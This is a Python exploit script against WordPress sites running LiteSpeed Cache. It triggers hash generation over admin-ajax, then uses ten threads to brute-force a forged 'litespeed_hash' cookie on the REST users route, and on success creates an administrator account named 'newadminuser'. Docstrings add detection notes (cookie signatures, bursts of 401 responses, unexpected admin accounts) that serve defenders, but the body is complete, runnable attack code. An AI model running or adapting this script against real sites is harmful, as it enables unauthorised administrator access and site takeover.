import requests
import random
import string
import concurrent.futures
# Configuration
# Base URL of the WordPress site the requests are sent to.
target_url = 'http://example.com'
# REST route used for both the hash probes and the user-creation call.
rest_api_endpoint = '/wp-json/wp/v2/users'
# AJAX route used once at start-up by trigger_hash_generation().
ajax_endpoint = '/wp-admin/admin-ajax.php'
# Sent as the value of the `litespeed_role` cookie.
admin_user_id = '1'
# Total number of guesses, split evenly across the worker threads.
num_hash_attempts = 1_000_000
num_workers = 10
# Account that create_admin_user() asks the site to create.
# Review note: the default username, and the e-mail address derived from it,
# are fixed strings, so they work as search terms when auditing a site's
# user table for accounts created by an unmodified copy of this script.
new_username = 'newadminuser'  # replace with the desired username
new_user_password = 'NewAdminPassword123!'  # replace with a secure password
def mt_srand(seed=None):
    """Seed Python's module-level ``random`` generator.

    The name mirrors PHP's ``mt_srand``; the body is a plain call to
    ``random.seed``. When *seed* is ``None``, Python chooses its own seed.

    Args:
        seed: Value passed unchanged to ``random.seed``.
    """
    random.seed(a=seed)
def mt_rand(min_value=0, max_value=2**32 - 1):
    """Return a random integer N with ``min_value <= N <= max_value``.

    Named after PHP's ``mt_rand``; implemented with ``random.randint``.
    None of the other functions in this listing call it.

    Args:
        min_value: Inclusive lower bound.
        max_value: Inclusive upper bound.
    """
    lower, upper = min_value, max_value
    return random.randint(lower, upper)
def generate_random_string(length=6):
    """Return *length* characters drawn from ASCII letters and digits.

    Characters are picked with replacement by ``random.choices`` from the
    62-character alphabet ``string.ascii_letters + string.digits``. The
    function uses the module-level ``random`` state directly and does not
    call ``mt_rand``.

    Args:
        length: Number of characters to produce (default 6).
    """
    alphabet = string.ascii_letters + string.digits
    picked = random.choices(alphabet, k=length)
    return ''.join(picked)
def trigger_hash_generation():
    """Send one form-encoded POST to the site's admin-ajax endpoint.

    The body carries ``action=async_litespeed`` and
    ``litespeed_type=crawler``; no cookies or credentials are attached.
    The author's log message describes the effect as triggering hash
    generation on the server. The result is only printed, never returned.

    Detection note: a POST to ``/wp-admin/admin-ajax.php`` with this
    action/type pair from a client without a logged-in session is worth
    logging, especially when a burst of requests to the REST users route
    follows from the same source.
    """
    form_fields = {
        'action': 'async_litespeed',
        'litespeed_type': 'crawler'
    }
    url = f'{target_url}{ajax_endpoint}'
    try:
        reply = requests.post(url, data=form_fields)
    except requests.RequestException as e:
        print(f'[ERROR] AJAX请求失败: {e}')
        return
    if reply.status_code == 200:
        print('[INFO] 已触发哈希生成。')
    else:
        print(f'[ERROR] 触发哈希生成失败 - 状态码: {reply.status_code}')
def attempt_hash(hash_value):
    """POST to the REST users route with a guessed hash in the cookies.

    The request has no body. It sets two cookies: ``litespeed_hash`` to
    *hash_value* and ``litespeed_role`` to the configured ``admin_user_id``.

    Detection note: these two cookie names on a request to
    ``/wp-json/wp/v2/users`` are the network signature of this script.
    A WAF or log rule can match on the cookie names alone, whatever the
    guessed value is.

    Args:
        hash_value: Candidate string placed in the ``litespeed_hash`` cookie.

    Returns:
        ``(response, cookies)`` when the request completes, or
        ``(None, None)`` when ``requests`` raises ``RequestException``.
    """
    guess_cookies = {
        'litespeed_hash': hash_value,
        'litespeed_role': admin_user_id
    }
    endpoint = f'{target_url}{rest_api_endpoint}'
    try:
        reply = requests.post(endpoint, cookies=guess_cookies)
    except requests.RequestException as e:
        print(f'[ERROR] 请求失败: {e}')
        return None, None
    return reply, guess_cookies
def create_admin_user(cookies):
    """POST a new-user JSON document to the REST users route.

    The document asks for an account named ``new_username`` with the
    ``administrator`` role, the configured password and an e-mail address
    of ``<new_username>@example.com``. HTTP 201 is reported as success;
    any other status is printed together with the response body.

    Detection note: an administrator account that nobody on the site team
    created is the lasting artefact of a successful run. With the defaults
    in this listing it is named ``newadminuser``. Auditing the user table
    and alerting on new administrator accounts covers this step even if
    the earlier requests were missed.

    Args:
        cookies: Cookie dict to send, as returned by ``attempt_hash``.
    """
    account = {
        'username': new_username,
        'password': new_user_password,
        'email': f'{new_username}@example.com',
        'roles': ['administrator']
    }
    endpoint = f'{target_url}{rest_api_endpoint}'
    try:
        reply = requests.post(endpoint, cookies=cookies, json=account)
    except requests.RequestException as e:
        print(f'[ERROR] 用户创建请求失败: {e}')
        return
    if reply.status_code == 201:
        print(f'[SUCCESS] 新管理员用户"{new_username}"创建成功!')
    else:
        print(f'[ERROR] 创建管理员用户失败 - 状态码: {reply.status_code} - 响应: {reply.text}')
def worker():
    """Run one thread's share of the guessing loop.

    Makes up to ``num_hash_attempts // num_workers`` requests through
    ``attempt_hash``, each with a fresh value from
    ``generate_random_string``. Every attempt and its full response body
    are printed. On HTTP 201 the worker calls ``create_admin_user`` with
    the same cookies and returns. HTTP 401 is logged as an invalid hash,
    and any other status as unexpected. Failed requests are skipped.

    Detection note: with the defaults in this listing each worker can send
    up to 100000 requests. On the server this shows up as a sustained run
    of 401 responses on the users route from one source, which
    rate-limiting or a threshold alert will surface.
    """
    attempts = num_hash_attempts // num_workers
    for _ in range(attempts):
        candidate = generate_random_string()
        print(f'[DEBUG] 尝试哈希: {candidate}')
        reply, jar = attempt_hash(candidate)
        if reply is None:
            # Request failed at the transport level; try the next guess.
            continue
        print(f'[DEBUG] 响应状态码: {reply.status_code}')
        print(f'[DEBUG] 响应内容: {reply.text}')
        if reply.status_code == 201:
            print(f'[SUCCESS] 找到有效哈希: {candidate}')
            create_admin_user(jar)
            return
        if reply.status_code == 401:
            print(f'[FAIL] 无效哈希: {candidate}')
            continue
        print(f'[ERROR] 哈希的意外响应: {candidate} - 状态码: {reply.status_code}')
def main():
    """Seed the generator, send the trigger request, then run the workers.

    Starts ``num_workers`` threads that each execute ``worker`` and blocks
    until all of them have finished.
    """
    # Seed the random number generator (the author's stand-in for mt_srand).
    mt_srand()
    trigger_hash_generation()
    with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as pool:
        pending = []
        for _ in range(num_workers):
            pending.append(pool.submit(worker))
        concurrent.futures.wait(pending)
# Run only when executed as a script; importing the module sends no requests.
if __name__ == '__main__':
    main()